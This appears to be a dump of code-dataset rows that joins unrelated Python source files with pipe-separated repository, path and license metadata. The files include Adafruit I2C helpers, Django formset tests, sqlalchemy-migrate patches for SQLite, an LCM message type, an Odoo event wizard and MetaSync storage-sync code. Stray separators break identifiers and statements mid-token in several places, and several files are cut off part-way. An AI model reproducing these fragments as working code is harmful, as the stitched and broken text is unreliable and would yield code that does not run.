# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import logging
import os
import subprocess
import Adafruit_GPIO.Platform as Platform
def reverseByteOrder(data):
"""DEPRECATED: See https://github.com/adafruit/Adafruit_Python_GPIO/issues/48"""
# # Courtesy Vishal Sapre
# byteCount = len(hex(data)[2:].replace('L','')[::2])
# val = 0
# for i in range(byteCount):
# val = (val << 8) | (data & 0xff)
# data >>= 8
# return val
raise RuntimeError('reverseByteOrder is deprecated! See: https://github.com/adafruit/Adafruit_Python_GPIO/issues/48')
def get_default_bus():
"""Return the default bus number based on the device platform. For a
Raspberry Pi either bus 0 or 1 (based on the Pi revision) will be returned.
For a Beaglebone Black the first user accessible bus, 1, will be returned.
"""
plat = Platform.platform_detect()
if plat == Platform.RASPBERRY_PI:
if Platform.pi_revision() == 1:
# Revision 1 Pi uses I2C bus 0.
return 0
else:
# Revision 2 Pi uses I2C bus 1.
return 1
elif plat == Platform.BEAGLEBONE_BLACK:
# Beaglebone Black has multiple I2C buses, default to 1 (P9_19 and P9_20).
return 1
else:
raise RuntimeError('Could not determine default I2C bus for platform.')
def get_i2c_device(address, busnum=None, i2c_interface=None, **kwargs):
"""Return an I2C device for the specified address and on the specified bus.
If busnum isn't specified, the default I2C bus for the platform will attempt
to be detected.
"""
if busnum is None:
busnum = get_default_bus()
return Device(address, busnum, i2c_interface, **kwargs)
def require_repeated_start():
"""Enable repeated start conditions for I2C register reads. This is the
normal behavior for I2C, however on some platforms like the Raspberry Pi
there are bugs which disable repeated starts unless explicitly enabled with
this function. See this thread for more details:
http://www.raspberrypi.org/forums/viewtopic.php?f=44&t=15840
"""
plat = Platform.platform_detect()
if plat == Platform.RASPBERRY_PI and os.path.exists('/sys/module/i2c_bcm2708/parameters/combined'):
# On the Raspberry Pi there is a bug where register reads don't send a
# repeated start condition like the kernel smbus I2C driver functions
# define. As a workaround this bit in the BCM2708 driver sysfs tree can
# be changed to enable I2C repeated starts.
subprocess.check_call('chmod 666 /sys/module/i2c_bcm2708/parameters/combined', shell=True)
subprocess.check_call('echo -n 1 > /sys/module/i2c_bcm2708/parameters/combined', shell=True)
# Other platforms are a no-op because they (presumably) have the correct
# behavior and send repeated starts.
class Device(object):
"""Class for communicating with an I2C device using the adafruit-pureio pure
python smbus library, or other smbus compatible I2C interface. Allows reading
and writing 8-bit, 16-bit, and byte array values to registers
on the device."""
def __init__(self, address, busnum, i2c_interface=None):
"""Create an instance of the I2C device at the specified address on the
specified I2C bus number."""
self._address = address
if i2c_interface is None:
# Use pure python I2C interface if none is specified.
import Adafruit_PureIO.smbus
self._bus = Adafruit_PureIO.smbus.SMBus(busnum)
else:
# Otherwise use the provided class to create an smbus interface.
self._bus = i2c_interface(busnum)
self._logger = logging.getLogger('Adafruit_I2C.Device.Bus.{0}.Address.{1:#0X}' \
.format(busnum, address))
def writeRaw8(self, value):
"""Write an 8-bit value on the bus (without register)."""
value = value & 0xFF
self._bus.write_byte(self._address, value)
self._logger.debug("Wrote 0x%02X",
value)
def write8(self, register, value):
"""Write an 8-bit value to the specified register."""
value = value & 0xFF
self._bus.write_byte_data(self._address, register, value)
self._logger.debug("Wrote 0x%02X to register 0x%02X",
value, register)
def write16(self, register, value):
"""Write a 16-bit value to the specified register."""
value = value & 0xFFFF
self._bus.write_word_data(self._address, register, value)
self._logger.debug("Wrote 0x%04X to register pair 0x%02X, 0x%02X",
value, register, register+1)
def writeList(self, register, data):
"""Write bytes to the specified register."""
self._bus.write_i2c_block_data(self._address, register, data)
self._logger.debug("Wrote to register 0x%02X: %s",
register, data)
def readList(self, register, length):
"""Read a length number of bytes from the specified register. Results
will be returned as a bytearray."""
results = self._bus.read_i2c_block_data(self._address, register, length)
self._logger.debug("Read the following from register 0x%02X: %s",
register, results)
return results
def readRaw8(self):
"""Read an 8-bit value on the bus (without register)."""
result = self._bus.read_byte(self._address) & 0xFF
self._logger.debug("Read 0x%02X",
result)
return result
def readU8(self, register):
"""Read an unsigned byte from the specified register."""
result = self._bus.read_byte_data(self._address, register) & 0xFF
| self._logger.debug("Read 0x%02X from register 0x%02X",
result, register)
return result
def readS8(self | , register):
"""Read a signed byte from the specified register."""
result = self.readU8(register)
if result > 127:
result -= 256
return result
def readU16(self, register, little_endian=True):
"""Read an unsigned 16-bit value from the specified register, with the
specified endianness (default little endian, or least significant byte
first)."""
result = self._bus.read_word_data(self._address,register) & 0xFFFF
self._logger.debug("Read 0x%04X from register pair 0x%02X, 0x%02X",
result, register, register+1)
# Swap bytes if using big endian because read_word_data assumes little
# endian on ARM (little endian) systems.
if not little_endian:
result = ((result << 8) & 0xFF00) + (result >> 8)
return result
def readS16(self, register, little_endian=True):
"""Read a signed 16-bit value from the specified register, with the
specified endianness (default little endian, or least significant byte
first)."""
result = self.readU16(regis |
Raekkeri/django-formsettesthelpers | src/formsettesthelpers/tests.py | Python | mit | 4,321 | 0.000463 | from django.test import TestCase
from django.core.urlresolvers import reverse
from django.contrib.auth.models import User
from django.forms.models import modelformset_factory
from django.forms.formsets import formset_factory
from formsettesthelpers import *
from formsettesthelpers.test_app.forms import (
UserFormSet,
PersonFormSet,
PersonForm,
)
class UsageTest(TestCase):
def test_demonstration(self):
from django.forms.models import modelformset_factory
# The following formset is something one could use in a view.
FormSet = modelformset_factory(User, fields=('username', 'email'))
# To test such view, we'd need to generate a formset data dict
# to POST to that view.
formset_helper = ModelFormSetHelper(For | mSet)
| data = formset_helper.generate([
{'username': 'admin', 'email': 'admin@example.com'},
{'username': 'user1', 'email': 'userer@example.com'},
], total_forms=2)
# `data` now contains the formset data, something like
# """{u'form-INITIAL_FORMS': 0, u'form-MAX_NUM_FORMS': 1000,
# u'form-1-username': 'user1', u'form-1-email':
# 'userer@example.com',...}"""
self.assertEquals(data['form-1-username'], 'user1')
# The `test_app` application just happens to have such view, so lets
# use that.
self.client.post(reverse('modelformset'), data)
self.assertEquals(User.objects.count(), 2)
self.assertEquals(User.objects.get(username='admin').email,
'admin@example.com')
self.assertEquals(User.objects.get(username='user1').email,
'userer@example.com')
class BasicFormsetTestSkeleton(object):
def setUp(self):
self.fh = self.helper_class(self.formset_class)
def test_valid(self):
data = self.fh.generate(self.two_forms_data, total_forms=2)
response = self.client.post(reverse(self.view_name), data)
self.assertEquals(response.content, 'Is valid')
def test_to_dict(self):
data = self.fh.generate(self.single_list_data, total_forms=1)
response = self.client.post(reverse(self.view_name), data)
self.assertEquals(response.content, 'Is valid')
def test_prefixed(self):
fh = self.helper_class(self.formset_class, prefix='humans')
data = fh.generate(self.two_forms_data, total_forms=2)
response = self.client.post(
reverse('prefixed_%s' % self.view_name), data)
self.assertEquals(response.content, 'Is valid')
def test_extra_is_zero(self):
fh = self.helper_class(self.formset_class_zero_extra)
data = fh.generate(self.two_forms_data, total_forms=2)
response = self.client.post(reverse(self.view_name), data)
self.assertEquals(response.content, 'Is valid')
class TestModelFormSet(BasicFormsetTestSkeleton, TestCase):
helper_class = ModelFormSetHelper
formset_class = UserFormSet
formset_class_zero_extra = modelformset_factory(
User, fields=('username', 'email', 'is_staff'), extra=0)
two_forms_data = [
{'username': 'user1', 'email': 'e@mail.com'},
{'username': 'user2', 'email': 'e2@mail.com'},
]
single_list_data = [['justin', 'j@mail.org']]
view_name = 'modelformset'
def test_valid(self):
super(TestModelFormSet, self).test_valid()
self.assertEquals(User.objects.count(), 2)
def test_to_dict(self):
super(TestModelFormSet, self).test_to_dict()
self.assertEquals(User.objects.count(), 1)
def test_prefixed(self):
super(TestModelFormSet, self).test_prefixed()
self.assertEquals(User.objects.count(), 2)
def test_extra_is_zero(self):
super(TestModelFormSet, self).test_extra_is_zero()
self.assertEquals(User.objects.count(), 2)
class TestFormSet(BasicFormsetTestSkeleton, TestCase):
helper_class = FormSetHelper
formset_class = PersonFormSet
formset_class_zero_extra = formset_factory(PersonForm, extra=0)
two_forms_data = [
{'name': 'Janelle', 'slug': 'j1', 'age': 24},
{'name': 'Joe', 'slug': 'j2', 'age': 25},
]
single_list_data = [['Max', 'max', 42]]
view_name = 'formset'
|
hockeybuggy/bigcommerce-api-python | bigcommerce/resources/banners.py | Python | mit | 218 | 0 | from .base import *
class Banners(ListableApiResource, CreateableApiResour | ce,
UpdateableApiResource, DeleteableApiRes | ource,
CollectionDeleteableApiResource):
resource_name = 'banners'
|
zhusz/ICCV17-fashionGAN | language/test_te.py | Python | bsd-3-clause | 2,918 | 0.002056 | import numpy as np
import sys
from random import randint
import torch
import torch.nn as nn
import torch.optim as optim
from torch.autograd import Variable
from scipy.io import loadmat
from scipy.io import savemat
mat = loadmat('../data_release/benchmark/language_original.mat')
for k, v in mat.iteritems():
exec(k + " = mat['" + k + "']")
dim_voc = 539
bsz = 1
m = 78979
dim_h = 100
dim_cate_new = 19
dim_color = 17
dim_gender = 2
dim_sleeve = 4
num_layers = 2
data_cate_new = torch.IntTensor(m, 1)
data_color = torch.IntTensor(m, 1)
data_gender = torch.IntTensor(m, 1)
data_sleeve = torch.IntTensor(m, 1)
for i in range(m):
data_cate_new[i][0] = int(cate_new[i][0] - 1)
data_color[i][0] = int(color_[i][0] - 1)
data_gender[i][0] = int(gender_[i][0])
data_sleeve[i][0] = int(sleeve_[i][0] - 1)
class define_network(nn.Module):
def __init__(self):
super(define_network, self).__init__()
self.rnn = nn.RNN(dim_voc, dim_h, num_layers)
self.net_cate_new = nn.Linear(dim_h, dim_cate_new)
self.net_color = nn.Linear(dim_h, dim_color)
self.net_gender = nn.Linear(dim_h, dim_gender)
self.net_sleeve = nn.Linear(dim_h, dim_sleeve)
def forward(self, x):
h0 = Variable(torch.zeros(num_layers, bsz, dim_h).cuda())
_, hn = self.rnn(x, h0)
hn2 = hn[-1]
y_cate_new = self.net_cate_new(hn2)
y_color = self.net_color(hn2)
y_gender = self.net_gender(hn2)
y_sleeve = self.net_sleeve(hn2)
return hn2, y_cate_new, y_color, y_gender, y_sleeve
model = define_network()
model.cuda()
model.load_state_dict(torch.load('rnn_latest.pth'))
criterion = nn.CrossEntropyLoss().cuda()
cuda_label_cate_new = Variable(torch.LongTensor(bsz).zero_().cuda())
cuda_label_color = Variable(torch.LongTensor(bsz).zero_().cuda())
cuda_label_ | gender = Variable(torch.LongTensor(bsz).zero_().cuda())
cuda_label_sleeve = Variable(torch.LongTensor(bsz).zero_().cuda())
model.eval()
test_hn2 = np.zeros((m, dim_h))
test_cate_new = np.zeros((m, dim_cate_new))
test_color = np.zeros((m, dim_color))
test_gender = np.zeros((m, dim_gender))
test_sleeve = np.zeros((m, dim_sleeve))
for sample_id in range(m):
| if sample_id % 1000 == 1:
print(sample_id)
c = codeJ[sample_id][0]
l = len(c)
cuda_c_onehot = torch.zeros(l, bsz, dim_voc).cuda()
for i in range(l):
cuda_c_onehot[i][0][int(c[i][0]-1)] = 1
cuda_c_onehot = Variable(cuda_c_onehot)
hn2, y_cate_new, y_color, y_gender, y_sleeve = model(cuda_c_onehot)
test_hn2[sample_id] = hn2.data[0].cpu().numpy()
test_cate_new[sample_id] = y_cate_new.data[0].cpu().numpy()
test_color[sample_id] = y_color.data[0].cpu().numpy()
test_gender[sample_id] = y_gender.data[0].cpu().numpy()
test_sleeve[sample_id] = y_sleeve.data[0].cpu().numpy()
result = {"hn2":test_hn2}
savemat("encode_hn2_rnn_100_2_full.mat", result)
|
gaolichuang/py-essential | essential/db/sqlalchemy/migration.py | Python | apache-2.0 | 10,186 | 0.000393 | # coding: utf-8
#
# Copyright (c) 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# Base on code in migrate/changeset/databases/sqlite.py which is under
# the following license:
#
# The MIT License
#
# Copyright (c) 2009 Evan Rosson, Jan Dittberner, Domen Kožar
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import os
import re
from migrate.changeset import ansisql
from migrate.changeset.databases import sqlite
from migrate import exceptions as versioning_exceptions
from migrate.versioning import api as versioning_api
from migrate.versioning.repository import Repository
import sqlalchemy
from sqlalchemy.schema import UniqueConstraint
from essential.db import exception
from essential.gettextutils import _
def _get_unique_constraints(self, table):
"""Retrieve information about existing unique constraints of the table
This feature is needed for _recreate_table() to work properly.
Unfortunately, it's not available in sqlalchemy 0.7.x/0.8.x.
"""
data = table.metadata.bind.execute(
"""SELECT sql
FROM sqlite_master
WHERE
type='table' AND
name=:table_name""",
table_name=table.name
).fetchone()[0]
UNIQUE_PATTERN = "CONSTRAINT (\w+) UNIQUE \(([^\)]+)\)"
return [
UniqueConstraint(
*[getattr(table.columns, c.strip(' "')) for c in cols.split(",")],
name=name
)
for name, cols in re.findall(UNIQUE_PATTERN, data)
]
def _recreate_table(self, table, column=None, delta=None, omit_uniques=None):
"""Recreate the table properly
Unlike the corresponding original method of sqlalchemy-migrate this one
doesn't drop existing unique constraints when creating a new one.
"""
table_name = self.preparer.format_table(table)
# we remove all indexes so as not to have
# problems during copy and re-create
for index in table.indexes:
index.drop()
# reflect existing unique constraints
for uc in self._get_unique_constraints(table):
table.append_constraint(uc)
# omit given unique constraints when creating a new table if required
table.constraints = set([
cons for cons in table.constraints
if omit_uniques is None or cons.name not in omit_uniques
])
self.append('ALTER TABLE %s RENAME TO migration_tmp' % table_name)
self.execute()
insertion_string = self._modify_table(table, column, delta)
table.create(bind=self.connection)
self.append(insertion_string % {'table_name': table_name})
self.execute()
self.append('DROP TABLE migration_tmp')
self.execute()
def _visit_migrate_unique_constraint(self, *p, **k):
"""Drop the given unique constraint
The corresponding original method of sqlalchemy-migrate just
raises NotImplemented error
"""
self.recreate_table(p[0].table, omit_uniques=[p[0].name])
def patch_migrate():
"""A workaround for SQLite's inability to alter things
SQLite abilities to alter tables are very limited (please read
http://www.sqlite.org/lang_altertable.html for more details).
E. g. one can't drop a column or a constraint in SQLite. The
workaround for this is to recreate the original table omitting
the corresponding constraint (or column).
sqlalchemy-migrate library has recreate_table() method that
implements this workaround, but it does it wrong:
- information about unique constraints of a table
is not retrieved. So if you have a table with on | e
unique constraint and a migration adding another one
you will end up with a table that has only the
latter unique constraint, and the former will be lost
- dropping of unique constraints | is not supported at all
The proper way to fix this is to provide a pull-request to
sqlalchemy-migrate, but the project seems to be dead. So we
can go on with monkey-patching of the lib at least for now.
"""
# this patch is needed to ensure that recreate_table() doesn't drop
# existing unique constraints of the table when creating a new one
helper_cls = sqlite.SQLiteHelper
helper_cls.recreate_table = _recreate_table
helper_cls._get_unique_constraints = _get_unique_constraints
# this patch is needed to be able to drop existing unique constraints
constraint_cls = sqlite.SQLiteConstraintDropper
constraint_cls.visit_migrate_unique_constraint = \
_visit_migrate_unique_constraint
constraint_cls.__bases__ = (ansisql.ANSIColumnDropper,
sqlite.SQLiteConstraintGenerator)
def db_sync(engine, abs_path, version=None, init_version=0, sanity_check=True):
"""Upgrade or downgrade a database.
Function runs the upgrade() or downgrade() functions in change scripts.
:param engine: SQLAlchemy engine instance for a given database
:param abs_path: Absolute path to migrate repository.
:param version: Database will upgrade/downgrade until this version.
If None - database will update to the latest
available version.
:param init_version: Initial database version
:param sanity_check: Require schema sanity checking for all tables
"""
if version is not None:
try:
version = int(version)
except ValueError:
raise exception.DbMigrationError(
message=_("version should be an integer"))
current_version = db_version(engine, abs_path, init_version)
repository = _find_migrate_repo(abs_path)
if sanity_check:
_db_schema_sanity_check(engine)
if version is None or version > current_version:
return versioning_api.upgrade(engine, repository, version)
else:
return versioning_api.downgrade(engine, repository,
version)
def _db_schema_sanity_check(engine):
"""Ensure all database tables were created with required parameters.
:param engine: SQLAlchemy engine instance for a given database
"""
if engine.name == 'mysql':
onlyutf8_sql = ('SELECT TABLE_NAME,TABLE_COLLATION '
'from information_schema.TABLES '
'where TABLE_SCHEMA=%s and '
'TABLE_COLLATION NOT LIKE "%%utf8%%"')
table_names = [res[0] for res in engine.execute(onlyutf8_sql,
engine.url.database)]
if len(table_names) > 0:
raise ValueError(_('Tables "%s" have non utf8 collation, '
|
iitml/AL | front_end/gui/plot_vals.py | Python | gpl-2.0 | 10 | 0 | val | s = {} | |
pioneers/topgear | python/forseti2/xbox_joystick_state.py | Python | apache-2.0 | 2,436 | 0.007389 | """LCM type definitions
This file automatically generated by lcm.
DO NOT MODIFY BY HAND!!!!
"""
import cStringIO as StringIO
import struct
import header
class xbox_joystick_state(object):
__slots__ = ["header", "axes", "buttons"]
A = 0
B = 1
X = 2
Y = 3
LB = 4
RB = 5
BACK = 6
START = 7
GUIDE = 8
LSTICK = 9
RSTICK = 10
def __init__(self):
self.header = None
self.axes = [ 0.0 for dim0 in range(6) ]
self.buttons = [ False for dim0 in range(11) ]
def encode(self):
buf = StringIO.StringIO()
buf.write(xbox_joystick_state._get_packed_fingerprint())
self._encode_one(buf)
return buf.getvalue()
def _encode_one(self, buf):
assert self.header._get_packed_fingerprint() == header.header._get_packed_fingerprint()
self.header._encode_one(buf)
buf.write(struct.pack('>6f', *self.axes[:6]))
buf.write(struct.pack('>11b', *self.buttons[:11]))
def decode(data):
if hasattr(data, 'read'):
buf = data
else:
buf = StringIO.StringIO(data)
if buf.read(8) != xbox_joystick_state._get_packed_fingerprint():
raise ValueError("Decode error")
return xbox_joystick_state._decode_one(buf)
decode = staticmethod(decode)
def _decode_one(buf):
self = xbox_joystick_state()
self.header = header.header._decode_one(buf)
self.axes = struct.unpack('>6f', buf.read(24))
self.buttons = struct.unpack('>11b', buf.read(11))
return self
_decode_one = staticmethod(_decode_one)
_hash = None
def _get_hash_recursive(parents):
if xbox_joystick_state in parents: return 0
newparents = parents + [xbox_joystick_state]
tmphash = (0xde0 | 322355bddf3cb+ header.header._get_hash_recursive(newparents)) & 0xffffffffffffffff
tmphash = (((tmphash<<1)&0xffffffffffffffff) + (tmphash>>63)) & 0xffffffffffffffff
return tmphash
_get_hash_recursive = staticmethod(_get_hash_recursive)
_packed_fingerprint = None
| def _get_packed_fingerprint():
if xbox_joystick_state._packed_fingerprint is None:
xbox_joystick_state._packed_fingerprint = struct.pack(">Q", xbox_joystick_state._get_hash_recursive([]))
return xbox_joystick_state._packed_fingerprint
_get_packed_fingerprint = staticmethod(_get_packed_fingerprint)
|
avanzosc/event-wip | sale_order_create_event_hour/wizard/wiz_event_append_assistant.py | Python | agpl-3.0 | 3,966 | 0 | # -*- coding: utf-8 -*-
# (c) 2016 Alfredo de la Fuente - AvanzOSC
# License AGPL-3 - See http://www.gnu.org/licenses/agpl-3.0.html
from openerp import fields, models, api
from openerp.addons.event_track_assistant._common import\
_convert_to_utc_date, _convert_to_local_date, _convert_time_to_float
date2string = fields.Date.to_string
datetime2string = fields.Datetime.to_string
str2datetime = fields.Datetime.from_string
class WizEventAppendAssistant(models.TransientModel):
_inherit = 'wiz.event.append.assistant'
type_hour = fields.Many2one(
comodel_name='hr.type.hour', string='Type hour')
start_time = fields.Float(string='Start time', default=0.0)
end_time = fields.Float(string='End time', default=0.0)
@api.model
def default_get(self, var_fields):
tz = self.env.user.tz
res = super(WizEventAppendAssistant, self).default_get(var_fields)
res.update({
'start_time': _convert_time_to_float(
_convert_to_utc_date(res.get('min_from_date'), tz=tz), tz=tz),
'end_time': _convert_time_to_float(
_convert_to_utc_date(res.get('max_to_date'), tz=tz), tz=tz),
})
return res
@api.multi
@api.onchange('from_date', 'start_time', 'to_date', 'end_time', 'partner')
def onchange_dates_and_partner(self):
self.ensure_one()
res = super(WizEventAppendAssistant, self).onchange_dates_and_partner()
return res
def revert_dates(self):
tz = self.env.user.tz
super(WizEventAppendAssistant, self).revert_dates()
self.start_time = _convert_time_to_float(_convert_to_utc_date(
self.min_from_date, tz=tz), tz=tz)
self.end_time = _convert_time_to_float | (_co | nvert_to_utc_date(
self.max_to_date, tz=tz), tz=tz)
def _update_registration_start_date(self, registration):
super(WizEventAppendAssistant, self)._update_registration_start_date(
registration)
reg_date_start = str2datetime(registration.date_start)
if self.start_time:
wiz_from_date = _convert_to_utc_date(
self.from_date, time=self.start_time, tz=self.env.user.tz)
if wiz_from_date != reg_date_start:
registration.date_start = wiz_from_date
def _update_registration_date_end(self, registration):
super(WizEventAppendAssistant, self)._update_registration_date_end(
registration)
reg_date_end = str2datetime(registration.date_end)
if self.end_time:
wiz_to_date = _convert_to_utc_date(
self.to_date, time=self.end_time, tz=self.env.user.tz)
if wiz_to_date != reg_date_end:
registration.date_end = wiz_to_date
def _prepare_registration_data(self, event):
vals = super(WizEventAppendAssistant,
self)._prepare_registration_data(event)
date_start = _convert_to_local_date(self.from_date).date()
date_start = _convert_to_utc_date(
date_start, time=self.start_time, tz=self.env.user.tz)
date_end = _convert_to_local_date(self.to_date).date()
date_end = _convert_to_utc_date(
date_end, time=self.end_time, tz=self.env.user.tz)
vals.update({
'date_start': event.date_begin
if datetime2string(date_start) < event.date_begin else date_start,
'date_end': event.date_end
if datetime2string(date_end) > event.date_end else date_end,
})
return vals
def _calc_dates_for_search_track(self, from_date, to_date):
super(WizEventAppendAssistant,
self)._calc_dates_for_search_track(from_date, to_date)
from_date = self._prepare_date_for_control(
from_date, time=self.start_time or 0.0)
to_date = self._prepare_date_for_control(
to_date, time=self.end_time or 24.0)
return from_date, to_date
|
harvard-lil/nuremberg | nuremberg/transcripts/migrations/0002_transcriptpage_updated_at.py | Python | mit | 619 | 0.001616 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-06-16 22:52
from __future__ import unicode_literals
import datetime
from d | jango.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
dep | endencies = [
('transcripts', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='transcriptpage',
name='updated_at',
field=models.DateTimeField(auto_now=True, default=datetime.datetime(2016, 6, 16, 22, 52, 58, 616986, tzinfo=utc)),
preserve_default=False,
),
]
|
UWNetworksLab/metasync | metasync/metasyncAPI.py | Python | mit | 48,287 | 0.003769 | import os
import io
import sys
import time
import threading
import struct
import pickle
import tempfile
import shutil
import types
from threading import Thread
from Queue import Queue
from multiprocessing import cpu_count
from mapping import DetMap2
import dbg
import util
import services
import translators
from blobs import *
from params import *
#
# basic use of ThreadPool:
# pool.submit(func, arg1, arg2)
# pool.join()
#
class Worker(Thread):
"""Thread executing tasks from a given tasks queue"""
def __init__(self, tasks):
Thread.__init__(self)
self.tasks = tasks
self.daemon = True
self.start()
def run(self):
while True:
clone, func, args, kargs = self.tasks.get()
#print 'work on job now %s' % self.ident
try:
srv = clone()
args = (srv, ) + args
func(*args, **kargs)
except Exception as e:
print(str(srv))
print(str(func))
print(e)
self.tasks.task_done()
class ThreadPool:
"""Pool of threads consuming tasks from a queue"""
def __init__(self, num_threads):
self.tasks = Queue(num_threads)
for _ in range(num_threads):
Worker(self.tasks)
def submit(self, c, func, *args, **kargs):
self.tasks.put((c, func, args, kargs))
def join(self):
self.tasks.join()
class ServiceThread(Thread):
"""A dedicated thread for each service
requests to this thread will be serialized"""
def __init__(self, service):
Thread.__init__(self)
self.srv = service
self.tasks = Queue(5) # TODO: what's the proper number
self.daemon = True
self.start()
def run(self):
while True:
func, args, kargs = self.tasks.get()
args = (self.srv, ) + args
try: func(*args, **kargs)
except Exception as e:
print e
self.tasks.task_done()
def submit(self, func, *args, **kargs):
self.tasks.put((func, args, kargs))
def join(self):
self.tasks.join()
class Scheduler:
def __init__(self, services, maxthreads=None):
self.srv_threads = {}
# XXX. inflexible in dealing with changes of services (list)
if(maxthreads is None or cpu_count() > maxthreads): maxthreads = cpu_count()
nthreads = maxthreads - len(services)
for srv in services:
self.srv_threads[srv] = ServiceThread(srv)
# thredpool thread number?
dbg.dbg("init scheduler: %s" % nthreads)
self.pool = ThreadPool(min(nthreads, 3*len(services)))
def submit(self, srv, serialize, func, *args, **kargs):
if serialize:
thread = self.srv_threads[srv]
thread.submit(func, *args, **kargs)
else:
"""
# haichen what's the purpose of the following code?
if srv in self.srv_threads:
dbg.dbg("putting into service thread")
thread = self.srv_threads[srv]
if thread.tasks.empty():
thread.submit(func, *args, **kargs)
else:
"""
#dbg.dbg("putting into thread pool")
self.pool.submit(srv.copy, func, *args, **kargs)
def join(self):
self.pool.join()
for srv in self.srv_threads:
self.srv_threads[srv].join()
# handle user's inputs of config options
def _get_conf_services(default):
assert type(default) in [types.NoneType, list]
if default is not None:
return ",".join(default)
# dirty user's input
slugs = ",".join(slug for (slug, _) in services.backends())
print "input storage backends, (e.g., %s)" % slugs
for (_, doc) in services.backends():
print " %s" % doc
return raw_input("> ").strip()
def _get_conf_nreplicas(default, nservices):
assert type(default) in [types.NoneType, int]
if defau | lt is not None:
return str(default)
# dirty user's input
print "input the number of replicas (default=2)"
while True:
replicas = raw_input("> ").strip()
if replicas == "":
replicas = "2"
if replicas.isdigit():
| if int(replicas) > nservices:
dbg.err("the number of replicas should not be larger than the number of services")
else:
return replicas
else:
print "input the number"
def _get_conf_encryptkey(default):
assert type(default) in [types.NoneType, str]
if default is not None:
return default
# NOTE.
# empty encrypt_key means, no-encryption
encrypt_key = ""
print "do you use encryption (y/n)?"
while True:
encrypt_yn = raw_input("> ").strip().lower()
if(encrypt_yn not in ['y','n']):
dbg.err("input with y/n")
continue
break
if(encrypt_yn == 'y'):
print "input keyphrase:"
encrypt_key = raw_input("> ").strip()
return encrypt_key
# in charge of a local machine (.metasync)
#
class MetaSync:
def __init__(self, root, opts=None):
#
# repo/.metasync/
# ^ ^
# | +-- meta
# +-- root
# useful path info
self.path_root = self._find_root(root)
self.path_meta = os.path.join(self.path_root, META_DIR)
self.path_conf = self.get_path("config")
self.path_objs = self.get_path("objects")
self.path_master = self.get_path("master")
self.path_head_history = self.get_path("head_history")
self.options = opts
# local blob store
self.blobstore = BlobStore2(self) #BlobStore(self.path_objs)
# load on demand
self.config = None
self.srvmap = {}
self.scheduler = None
self.translators = []
self.mapping = None
# post init
self._load()
def _find_root(self, curpath):
# find repo
curpath = os.path.abspath(curpath)
orgpath = curpath
auth_dir = os.path.join(os.path.expanduser("~"), ".metasync")
while True:
path = os.path.join(curpath, META_DIR)
if(path != auth_dir and os.path.exists(os.path.join(curpath, META_DIR))): return curpath
sp = os.path.split(curpath)
if(sp[1] == ""): break
curpath = sp[0]
return orgpath
@property
def services(self):
return self.srvmap.values()
# load member variables from config
def _load(self):
if not self.check_sanity():
return
if(not os.path.exists(AUTH_DIR)): os.mkdir(AUTH_DIR)
# load config
self.config = util.load_config(self.path_conf)
self.namespace = self.config.get("core", "namespace")
self.clientid = self.config.get("core", "clientid")
# load services from config
self.srvmap = {}
for tok in self.config.get("backend", "services").split(","):
srv = services.factory(tok)
self.srvmap[srv.sid()] = srv
self.nreplicas = int(self.config.get("backend", "nreplicas"))
nthreads = self.options.nthreads if self.options is not None else 2
self.scheduler = Scheduler(self.services, (nthreads+1)*len(self.srvmap))
# load translator pipe
if self.is_encypted():
self.translators.append(translators.TrEncrypt(self))
# TODO. for integrity option
# if self.is_signed():
# self.translators.append(TrSigned(self))
beg = time.time()
if(os.path.exists(self.get_path("mapping.pcl"))):
with open(self.get_path("mapping.pcl")) as f:
self.mapping = pickle.load(f)
else:
mapconfig = []
for srv in self.services:
mapconfig.append((srv.sid(), srv.info_storage()/GB))
hspacesum = sum(map(lambda x:x[1], mapconfig))
hspace = max(hspacesum+1, 1024)
self.mapping = DetMap2(mapconfig, hspace=hspace, replica |
ericmjl/bokeh | examples/integration/widgets/tabs_with_multiselect.py | Python | bsd-3-clause | 195 | 0 | from bokeh.io import | save
from bokeh.models import MultiSelect, Tabs
select = MultiSelect(options=["First option", "Second option"])
tabs = Tabs(tabs=[("A tab", select)], widt | h=300)
save(tabs)
|
les69/calvin-base | calvin/tests/test_actor.py | Python | apache-2.0 | 7,248 | 0.000552 | # -*- coding: utf-8 -*-
# Copyright (c) 2015 Ericsson AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
from mock import Mock
from calvin.tests import DummyNode
from calvin.runtime.north.actormanager import ActorManager
from calvin.runtime.south.endpoint import LocalOutEndpoint, LocalInEndpoint
from calvin.actor.actor import Actor
pytestmark = pytest.mark.unittest
def create_actor(node):
actor_manager = ActorManager(node)
actor_id = actor_manager.new('std.Identity', {})
